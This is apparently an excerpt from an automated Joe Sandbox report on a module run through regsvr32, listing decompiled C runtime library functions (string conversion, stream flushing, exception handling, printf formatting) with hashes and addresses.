                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: DecodePointer__doserrno_invalid_parameter
                                                                                        • String ID: ((cnt & 1) == 0)$_write_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                                                        • API String ID: 1098298932-1795423647
                                                                                        • Opcode ID: 76c1c365018f90ed7cb3e44e1db6073c5157a9fa4c515fc26b073f11152878b0
                                                                                        • Instruction ID: 5ff663975ae3511ed6d2782a661d896beba523f0d1828ccbc0613956f22d1229
                                                                                        • Opcode Fuzzy Hash: 76c1c365018f90ed7cb3e44e1db6073c5157a9fa4c515fc26b073f11152878b0
                                                                                        • Instruction Fuzzy Hash: CBE03960A0890696F6D4AF14EC113EE2290A740788FE14222908D072F2CB7EA605C741
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 16%
                                                                                        			E000007FE7FEF9D2F570(intOrPtr __edx, long long __rcx, void* __rdx, long long __r8, void* _a8, intOrPtr _a16, long long _a24, intOrPtr _a32, void* _a40, intOrPtr _a48, intOrPtr _a64) {
                                                                                        				long long _v24;
                                                                                        				intOrPtr _v32;
                                                                                        				long long _v40;
                                                                                        				signed int _v48;
                                                                                        				int _v52;
                                                                                        				int _v56;
                                                                                        				signed int _v64;
                                                                                        				long long _v72;
                                                                                        				long long _t82;
                                                                                        
                                                                                        				_a32 = r9d;
                                                                                        				_a24 = __r8;
                                                                                        				_a16 = __edx;
                                                                                        				_a8 = __rcx;
                                                                                        				_v56 = 0;
                                                                                        				if (_a48 != 0) goto 0xf9d2f5ab;
                                                                                        				_a48 =  *((intOrPtr*)( *_a8 + 4));
                                                                                        				if (_a64 == 0) goto 0xf9d2f5bf;
                                                                                        				_v32 = 9;
                                                                                        				goto 0xf9d2f5c7;
                                                                                        				_v32 = 1;
                                                                                        				_v64 = 0;
                                                                                        				_v72 = 0;
                                                                                        				r9d = _a32;
                                                                                        				_v48 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                                                                        				if (_v48 != 0) goto 0xf9d2f60b;
                                                                                        				goto 0xf9d2f6f8;
                                                                                        				if (0 != 0) goto 0xf9d2f652;
                                                                                        				if (_v48 <= 0) goto 0xf9d2f652;
                                                                                        				if (_v48 - 0xfffffff0 > 0) goto 0xf9d2f652;
                                                                                        				_t82 = _v48 + _v48 + 0x10;
                                                                                        				E000007FE7FEF9D2F3B0(malloc(??), 0xdddd, _t82);
                                                                                        				_v24 = _t82;
                                                                                        				goto 0xf9d2f65b;
                                                                                        				_v24 = 0;
                                                                                        				_v40 = _v24;
                                                                                        				if (_v40 != 0) goto 0xf9d2f674;
                                                                                        				goto 0xf9d2f6f8;
                                                                                        				E000007FE7FEF9D232B0(0, _a48, 0, _v40, __rdx, _v48 << 1);
                                                                                        				_v64 = _v48;
                                                                                        				_v72 = _v40;
                                                                                        				r9d = _a32;
                                                                                        				_v52 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                                                                        				if (_v52 == 0) goto 0xf9d2f6ea;
                                                                                        				r8d = _v52;
                                                                                        				_v56 = GetStringTypeW(??, ??, ??, ??);
                                                                                        				E000007FE7FEF9D2F3E0(_v40);
                                                                                        				return _v56;
                                                                                        			}












                                                                                        0x7fef9d2f570
                                                                                        0x7fef9d2f575
                                                                                        0x7fef9d2f57a
                                                                                        0x7fef9d2f57e
                                                                                        0x7fef9d2f587
                                                                                        0x7fef9d2f597
                                                                                        0x7fef9d2f5a4
                                                                                        0x7fef9d2f5b3
                                                                                        0x7fef9d2f5b5
                                                                                        0x7fef9d2f5bd
                                                                                        0x7fef9d2f5bf
                                                                                        0x7fef9d2f5c7
                                                                                        0x7fef9d2f5cf
                                                                                        0x7fef9d2f5d8
                                                                                        0x7fef9d2f5f9
                                                                                        0x7fef9d2f602
                                                                                        0x7fef9d2f606
                                                                                        0x7fef9d2f60f
                                                                                        0x7fef9d2f616
                                                                                        0x7fef9d2f62a
                                                                                        0x7fef9d2f631
                                                                                        0x7fef9d2f646
                                                                                        0x7fef9d2f64b
                                                                                        0x7fef9d2f650
                                                                                        0x7fef9d2f652
                                                                                        0x7fef9d2f660
                                                                                        0x7fef9d2f66b
                                                                                        0x7fef9d2f66f
                                                                                        0x7fef9d2f686
                                                                                        0x7fef9d2f68f
                                                                                        0x7fef9d2f698
                                                                                        0x7fef9d2f69d
                                                                                        0x7fef9d2f6bf
                                                                                        0x7fef9d2f6c8
                                                                                        0x7fef9d2f6d2
                                                                                        0x7fef9d2f6e6
                                                                                        0x7fef9d2f6ef
                                                                                        0x7fef9d2f6fc

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$AllocaMarkStringTypemalloc
                                                                                        • String ID:
                                                                                        • API String ID: 2618398691-0
                                                                                        • Opcode ID: 05827e3f81ca9d4f9e036e9cc38fe06689f9ef4e573a4afec1c92632646a1a95
                                                                                        • Instruction ID: 79d90a16a348acae5d1e8c33d658c717d72e619f6ed261e78ac23a31a9732c13
                                                                                        • Opcode Fuzzy Hash: 05827e3f81ca9d4f9e036e9cc38fe06689f9ef4e573a4afec1c92632646a1a95
                                                                                        • Instruction Fuzzy Hash: 9941E7726187818AD7A08B19E48476EB7E0F385795F204525EADE43BB8DB7ED484CF00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 20%
                                                                                        			E000007FE7FEF9D3FF00(intOrPtr __ecx, intOrPtr _a8) {
                                                                                        				signed int _v16;
                                                                                        				signed int _v20;
                                                                                        				signed int _v24;
                                                                                        
                                                                                        				_a8 = __ecx;
                                                                                        				_v24 = 0;
                                                                                        				_v16 = 0;
                                                                                        				0xf9d29300();
                                                                                        				_v20 = 0;
                                                                                        				_v20 = _v20 + 1;
                                                                                        				if (_v20 -  *0xf9d4e520 >= 0) goto 0xf9d40042;
                                                                                        				if ( *((long long*)( *0xf9d4d500 + _v20 * 8)) == 0) goto 0xf9d4003d;
                                                                                        				if (( *( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)) + 0x18) & 0x00000083) == 0) goto 0xf9d4003d;
                                                                                        				E000007FE7FEF9D3AE90(_v20,  *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)));
                                                                                        				if (( *( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)) + 0x18) & 0x00000083) == 0) goto 0xf9d40024;
                                                                                        				if (_a8 != 1) goto 0xf9d3ffe1;
                                                                                        				if (E000007FE7FEF9D3FD70( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8))) == 0xffffffff) goto 0xf9d3ffdf;
                                                                                        				_v24 = _v24 + 1;
                                                                                        				goto 0xf9d40024;
                                                                                        				if (_a8 != 0) goto 0xf9d40024;
                                                                                        				if (( *( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)) + 0x18) & 0x00000002) == 0) goto 0xf9d40024;
                                                                                        				if (E000007FE7FEF9D3FD70( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8))) != 0xffffffff) goto 0xf9d40024;
                                                                                        				_v16 = 0xffffffff;
                                                                                        				E000007FE7FEF9D3AF60(_v20,  *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)));
                                                                                        				goto L1;
                                                                                        				__ecx = 1;
                                                                                        				__eax = E000007FE7FEF9D29360(__eax, 1);
                                                                                        				if (_a8 != 1) goto 0xf9d4005b;
                                                                                        				__eax = _v24;
                                                                                        				goto 0xf9d4005f;
                                                                                        				__eax = _v16;
                                                                                        				return _v16;
                                                                                        			}






                                                                                        0x7fef9d3ff00
                                                                                        0x7fef9d3ff08
                                                                                        0x7fef9d3ff10
                                                                                        0x7fef9d3ff1d
                                                                                        0x7fef9d3ff23
                                                                                        0x7fef9d3ff33
                                                                                        0x7fef9d3ff41
                                                                                        0x7fef9d3ff58
                                                                                        0x7fef9d3ff78
                                                                                        0x7fef9d3ff92
                                                                                        0x7fef9d3ffb2
                                                                                        0x7fef9d3ffb9
                                                                                        0x7fef9d3ffd3
                                                                                        0x7fef9d3ffdb
                                                                                        0x7fef9d3ffdf
                                                                                        0x7fef9d3ffe6
                                                                                        0x7fef9d40000
                                                                                        0x7fef9d4001a
                                                                                        0x7fef9d4001c
                                                                                        0x7fef9d40038
                                                                                        0x7fef9d4003d
                                                                                        0x7fef9d40042
                                                                                        0x7fef9d40047
                                                                                        0x7fef9d40051
                                                                                        0x7fef9d40053
                                                                                        0x7fef9d40059
                                                                                        0x7fef9d4005b
                                                                                        0x7fef9d40063

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _fflush_nolock$_lock_file2_unlock_unlock_file2
                                                                                        • String ID:
                                                                                        • API String ID: 1144694634-0
                                                                                        • Opcode ID: 9c48fc7a63950d59b547df98b2f037ee7aefe6eda58a35de18d9feeb54d081ae
                                                                                        • Instruction ID: ac60367dbbc332a4a9212cb966813f3525e1d277dda9a6ba7eb8e741a9ed9bf6
                                                                                        • Opcode Fuzzy Hash: 9c48fc7a63950d59b547df98b2f037ee7aefe6eda58a35de18d9feeb54d081ae
                                                                                        • Instruction Fuzzy Hash: D441F136A08905C5EB70CB1DE98173D73E0F799B49F204225EA9D877B4CB3EE945CA01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 27%
                                                                                        			E000007FE7FEF9D33CC0(void* __edx, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, long long _a16, long long _a24, long long _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
                                                                                        				long long _v16;
                                                                                        				long long _v24;
                                                                                        				intOrPtr _v32;
                                                                                        				long long _v40;
                                                                                        				long long _v48;
                                                                                        				intOrPtr _v52;
                                                                                        				intOrPtr _v56;
                                                                                        				signed int _v64;
                                                                                        				long long _v72;
                                                                                        				char _v80;
                                                                                        				long long _v88;
                                                                                        				void* _t135;
                                                                                        				void* _t145;
                                                                                        				void* _t147;
                                                                                        				void* _t148;
                                                                                        				void* _t149;
                                                                                        				signed int* _t200;
                                                                                        				intOrPtr _t206;
                                                                                        
                                                                                        				_a32 = __r9;
                                                                                        				_a24 = __r8;
                                                                                        				_a16 = __rdx;
                                                                                        				_a8 = __rcx;
                                                                                        				0xf9d24000();
                                                                                        				if ( *((intOrPtr*)(__rax + 0x2c0)) != 0) goto 0xf9d33d6c;
                                                                                        				if ( *_a8 == 0xe06d7363) goto 0xf9d33d6c;
                                                                                        				if ( *_a8 != 0x80000029) goto 0xf9d33d2a;
                                                                                        				if ( *((intOrPtr*)(_a8 + 0x18)) != 0xf) goto 0xf9d33d2a;
                                                                                        				if ( *((long long*)(_a8 + 0x60)) == 0x19930520) goto 0xf9d33d6c;
                                                                                        				if ( *_a8 == 0x80000026) goto 0xf9d33d6c;
                                                                                        				if (( *_a40 & 0x1fffffff) - 0x19930522 < 0) goto 0xf9d33d6c;
                                                                                        				if ((_a40[9] & 0x00000001) == 0) goto 0xf9d33d6c;
                                                                                        				goto 0xf9d3409c;
                                                                                        				if (( *(_a8 + 4) & 0x00000066) == 0) goto 0xf9d33ef3;
                                                                                        				if (_a40[1] == 0) goto 0xf9d33ee4;
                                                                                        				if (_a48 != 0) goto 0xf9d33ee4;
                                                                                        				if (( *(_a8 + 4) & 0x00000020) == 0) goto 0xf9d33e40;
                                                                                        				if ( *_a8 != 0x80000026) goto 0xf9d33e40;
                                                                                        				_v56 = E000007FE7FEF9D33A60(_a24, _a40, _a32,  *((intOrPtr*)(_a24 + 0xf8)));
                                                                                        				if (_v56 - 0xffffffff < 0) goto 0xf9d33e0a;
                                                                                        				if (_v56 - _a40[1] >= 0) goto 0xf9d33e0a;
                                                                                        				goto 0xf9d33e0f;
                                                                                        				E000007FE7FEF9D2CF80(_a40);
                                                                                        				r9d = _v56;
                                                                                        				E000007FE7FEF9D34F20(_a40, _a16, _a32, _a40);
                                                                                        				goto 0xf9d33ec7;
                                                                                        				if (( *(_a8 + 4) & 0x00000020) == 0) goto 0xf9d33ec7;
                                                                                        				if ( *_a8 != 0x80000029) goto 0xf9d33ec7;
                                                                                        				_v48 = _a8;
                                                                                        				_v52 =  *((intOrPtr*)(_v48 + 0x38));
                                                                                        				if (_v52 - 0xffffffff < 0) goto 0xf9d33e95;
                                                                                        				if (_v52 - _a40[1] >= 0) goto 0xf9d33e95;
                                                                                        				goto 0xf9d33e9a;
                                                                                        				E000007FE7FEF9D2CF80(_a40);
                                                                                        				r9d = _v52;
                                                                                        				E000007FE7FEF9D34F20(_v48,  *((intOrPtr*)(_v48 + 0x28)), _a32, _a40);
                                                                                        				goto 0xf9d3409c;
                                                                                        				E000007FE7FEF9D2E790(_v52 - _a40[1], _v48, _a16, _a32, _a40);
                                                                                        				goto 0xf9d34097;
                                                                                        				if (_a40[3] != 0) goto 0xf9d33f59;
                                                                                        				if (( *_a40 & 0x1fffffff) - 0x19930521 < 0) goto 0xf9d34097;
                                                                                        				_t200 = _a40;
                                                                                        				if ( *((intOrPtr*)(_t200 + 0x20)) == 0) goto 0xf9d33f44;
                                                                                        				_t135 = E000007FE7FEF9D2E680( *_a40 & 0x1fffffff, _t200);
                                                                                        				_v24 = _t200 + _a40[8];
                                                                                        				goto 0xf9d33f4d;
                                                                                        				_v24 = 0;
                                                                                        				if (_v24 == 0) goto 0xf9d34097;
                                                                                        				if ( *_a8 != 0xe06d7363) goto 0xf9d34041;
                                                                                        				if ( *((intOrPtr*)(_a8 + 0x18)) - 3 < 0) goto 0xf9d34041;
                                                                                        				if ( *((intOrPtr*)(_a8 + 0x20)) - 0x19930522 <= 0) goto 0xf9d34041;
                                                                                        				_t206 =  *((intOrPtr*)(_a8 + 0x30));
                                                                                        				if ( *((intOrPtr*)(_t206 + 8)) == 0) goto 0xf9d33fc5;
                                                                                        				E000007FE7FEF9D2E6A0(_t135, _t206);
                                                                                        				_v16 = _t206 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 8));
                                                                                        				goto 0xf9d33fce;
                                                                                        				_v16 = 0;
                                                                                        				_v40 = _v16;
                                                                                        				_t177 = _v40;
                                                                                        				if (_v40 == 0) goto 0xf9d34041;
                                                                                        				_v64 = _a64 & 0x000000ff;
                                                                                        				_v72 = _a56;
                                                                                        				_v80 = _a48;
                                                                                        				_v88 = _a40;
                                                                                        				_v32 = _v40();
                                                                                        				goto 0xf9d34097;
                                                                                        				_v64 = _a56;
                                                                                        				_v72 = _a48;
                                                                                        				_v80 = _a64 & 0x000000ff;
                                                                                        				_v88 = _a40;
                                                                                        				E000007FE7FEF9D340B0(_t145, _t147, _t148, _t149, _t177, _a40, _a8, _a16, _a24, _a32);
                                                                                        				return 1;
                                                                                        			}





















                                                                                        0x7fef9d33cc0
                                                                                        0x7fef9d33cc5
                                                                                        0x7fef9d33cca
                                                                                        0x7fef9d33ccf
                                                                                        0x7fef9d33cd8
                                                                                        0x7fef9d33ce4
                                                                                        0x7fef9d33cf8
                                                                                        0x7fef9d33d08
                                                                                        0x7fef9d33d16
                                                                                        0x7fef9d33d28
                                                                                        0x7fef9d33d38
                                                                                        0x7fef9d33d4e
                                                                                        0x7fef9d33d60
                                                                                        0x7fef9d33d67
                                                                                        0x7fef9d33d7c
                                                                                        0x7fef9d33d8e
                                                                                        0x7fef9d33d9c
                                                                                        0x7fef9d33db2
                                                                                        0x7fef9d33dc6
                                                                                        0x7fef9d33dec
                                                                                        0x7fef9d33df5
                                                                                        0x7fef9d33e06
                                                                                        0x7fef9d33e08
                                                                                        0x7fef9d33e0a
                                                                                        0x7fef9d33e0f
                                                                                        0x7fef9d33e2c
                                                                                        0x7fef9d33e3b
                                                                                        0x7fef9d33e50
                                                                                        0x7fef9d33e60
                                                                                        0x7fef9d33e6a
                                                                                        0x7fef9d33e77
                                                                                        0x7fef9d33e80
                                                                                        0x7fef9d33e91
                                                                                        0x7fef9d33e93
                                                                                        0x7fef9d33e95
                                                                                        0x7fef9d33e9a
                                                                                        0x7fef9d33eb8
                                                                                        0x7fef9d33ec2
                                                                                        0x7fef9d33edf
                                                                                        0x7fef9d33eee
                                                                                        0x7fef9d33eff
                                                                                        0x7fef9d33f15
                                                                                        0x7fef9d33f1b
                                                                                        0x7fef9d33f27
                                                                                        0x7fef9d33f29
                                                                                        0x7fef9d33f3d
                                                                                        0x7fef9d33f42
                                                                                        0x7fef9d33f44
                                                                                        0x7fef9d33f53
                                                                                        0x7fef9d33f67
                                                                                        0x7fef9d33f79
                                                                                        0x7fef9d33f8e
                                                                                        0x7fef9d33f9c
                                                                                        0x7fef9d33fa4
                                                                                        0x7fef9d33fa6
                                                                                        0x7fef9d33fbe
                                                                                        0x7fef9d33fc3
                                                                                        0x7fef9d33fc5
                                                                                        0x7fef9d33fd3
                                                                                        0x7fef9d33fd8
                                                                                        0x7fef9d33fde
                                                                                        0x7fef9d33fe8
                                                                                        0x7fef9d33ff4
                                                                                        0x7fef9d34000
                                                                                        0x7fef9d3400c
                                                                                        0x7fef9d34035
                                                                                        0x7fef9d3403f
                                                                                        0x7fef9d34049
                                                                                        0x7fef9d34055
                                                                                        0x7fef9d34061
                                                                                        0x7fef9d3406d
                                                                                        0x7fef9d34092
                                                                                        0x7fef9d340a0

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _inconsistency
                                                                                        • String ID: csm$csm
                                                                                        • API String ID: 32975420-3733052814
                                                                                        • Opcode ID: b62b0453fdffd86c1ea8e56b24d9441da31a01f9fe07ee07632383c0adf59322
                                                                                        • Instruction ID: 322b6d8969e66d64c69545eab8578d1d9fa1a0c6b52bdd8827c0b0ea251a3b55
                                                                                        • Opcode Fuzzy Hash: b62b0453fdffd86c1ea8e56b24d9441da31a01f9fe07ee07632383c0adf59322
                                                                                        • Instruction Fuzzy Hash: 12A1EE3660CBC5C6D7B08B15E5447AEB7A0F385B95FA04126EACD87BA9CB3DD844CB40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        • ((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[ca, xrefs: 000007FEF9D2991D
                                                                                        • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\localref.c, xrefs: 000007FEF9D29932
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: __free_lconv_mon__free_lconv_num
                                                                                        • String ID: ((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[ca$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\localref.c
                                                                                        • API String ID: 2148069796-2706031433
                                                                                        • Opcode ID: 5530c5148454f32ed92c453347a6e128a1bc42f7b71ac9e6bc1d50a4750a2989
                                                                                        • Instruction ID: 7353ab124090f0710997c18079ef38eae00693e27689a0bfa21a481d68f00224
                                                                                        • Opcode Fuzzy Hash: 5530c5148454f32ed92c453347a6e128a1bc42f7b71ac9e6bc1d50a4750a2989
                                                                                        • Instruction Fuzzy Hash: F4A10E36A18A8581EB908F49E4853BEA3E0F3C4B54F665036EA8E477B5CFBED445C740
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter
                                                                                        • String ID: ("Buffer too small", 0)$_vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                                                        • API String ID: 2123368286-3717698799
                                                                                        • Opcode ID: 1aafbfe16f86ccf21253850ca152cd04a8ee8357f57b5e583563c43112fb4b7a
                                                                                        • Instruction ID: b28b411edc77ea5f57a42c4ce070c51137fe1cd7001121a3be123fc4e483bd38
                                                                                        • Opcode Fuzzy Hash: 1aafbfe16f86ccf21253850ca152cd04a8ee8357f57b5e583563c43112fb4b7a
                                                                                        • Instruction Fuzzy Hash: FC810D32A1DB8686DAB08B29E84476E73E0F385765F204225E6ED437E9DF3DD445CB01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 20%
                                                                                        			E000007FE7FEF9D3C719(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
                                                                                        				signed int _t212;
                                                                                        				signed char _t217;
                                                                                        				intOrPtr _t252;
                                                                                        				signed int _t327;
                                                                                        				signed int _t328;
                                                                                        				signed long long _t331;
                                                                                        				intOrPtr* _t354;
                                                                                        				signed long long _t379;
                                                                                        
                                                                                        				_t327 = __rax;
                                                                                        				_a708 = 0x27;
                                                                                        				_a72 = 0x10;
                                                                                        				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c754;
                                                                                        				_a84 = 0x30;
                                                                                        				_a85 = _a708 + 0x51;
                                                                                        				_a92 = 2;
                                                                                        				_a72 = 8;
                                                                                        				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c777;
                                                                                        				asm("bts eax, 0x9");
                                                                                        				if ((_a80 & 0x00008000) == 0) goto 0xf9d3c79e;
                                                                                        				E000007FE7FEF9D31EA0( &_a1112);
                                                                                        				_a824 = _t327;
                                                                                        				goto 0xf9d3c84b;
                                                                                        				if ((_a80 & 0x00001000) == 0) goto 0xf9d3c7c5;
                                                                                        				E000007FE7FEF9D31EA0( &_a1112);
                                                                                        				_a824 = _t327;
                                                                                        				goto 0xf9d3c84b;
                                                                                        				if ((_a80 & 0x00000020) == 0) goto 0xf9d3c810;
                                                                                        				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c7f6;
                                                                                        				_t328 = E000007FE7FEF9D31E40( &_a1112);
                                                                                        				_a824 = _t328;
                                                                                        				goto 0xf9d3c80e;
                                                                                        				E000007FE7FEF9D31E40( &_a1112);
                                                                                        				_a824 = _t328;
                                                                                        				goto 0xf9d3c84b;
                                                                                        				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c834;
                                                                                        				E000007FE7FEF9D31E40( &_a1112);
                                                                                        				_a824 = _t328;
                                                                                        				goto 0xf9d3c84b;
                                                                                        				E000007FE7FEF9D31E40( &_a1112);
                                                                                        				_a824 = _t328;
                                                                                        				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c882;
                                                                                        				if (_a824 >= 0) goto 0xf9d3c882;
                                                                                        				_a832 =  ~_a824;
                                                                                        				asm("bts eax, 0x8");
                                                                                        				goto 0xf9d3c892;
                                                                                        				_t331 = _a824;
                                                                                        				_a832 = _t331;
                                                                                        				if ((_a80 & 0x00008000) != 0) goto 0xf9d3c8c7;
                                                                                        				if ((_a80 & 0x00001000) != 0) goto 0xf9d3c8c7;
                                                                                        				_a832 = _a832 & _t331;
                                                                                        				if (_a116 >= 0) goto 0xf9d3c8d8;
                                                                                        				_a116 = 1;
                                                                                        				goto 0xf9d3c8f5;
                                                                                        				_a80 = _a80 & 0xfffffff7;
                                                                                        				if (_a116 - 0x200 <= 0) goto 0xf9d3c8f5;
                                                                                        				_a116 = 0x200;
                                                                                        				if (_a832 != 0) goto 0xf9d3c908;
                                                                                        				_a92 = 0;
                                                                                        				_a64 =  &_a687;
                                                                                        				_t212 = _a116;
                                                                                        				_a116 = _a116 - 1;
                                                                                        				if (_t212 > 0) goto 0xf9d3c936;
                                                                                        				if (_a832 == 0) goto 0xf9d3c9d3;
                                                                                        				_a1040 = _a72;
                                                                                        				_a816 = _t212 / _a1040 + 0x30;
                                                                                        				_a1048 = _a72;
                                                                                        				if (_a816 - 0x39 <= 0) goto 0xf9d3c9b2;
                                                                                        				_t217 = _a816 + _a708;
                                                                                        				_a816 = _t217;
                                                                                        				 *_a64 = _a816 & 0x000000ff;
                                                                                        				_a64 = _a64 - 1;
                                                                                        				goto 0xf9d3c915;
                                                                                        				_a104 = _t217;
                                                                                        				_a64 = _a64 + 1;
                                                                                        				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ca31;
                                                                                        				if (_a104 == 0) goto 0xf9d3ca12;
                                                                                        				if ( *_a64 == 0x30) goto 0xf9d3ca31;
                                                                                        				_a64 = _a64 - 1;
                                                                                        				 *_a64 = 0x30;
                                                                                        				_a104 = _a104 + 1;
                                                                                        				if (_a108 != 0) goto 0xf9d3cc6e;
                                                                                        				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ca95;
                                                                                        				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ca63;
                                                                                        				_a84 = 0x2d;
                                                                                        				_a92 = 1;
                                                                                        				goto 0xf9d3ca95;
                                                                                        				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ca7d;
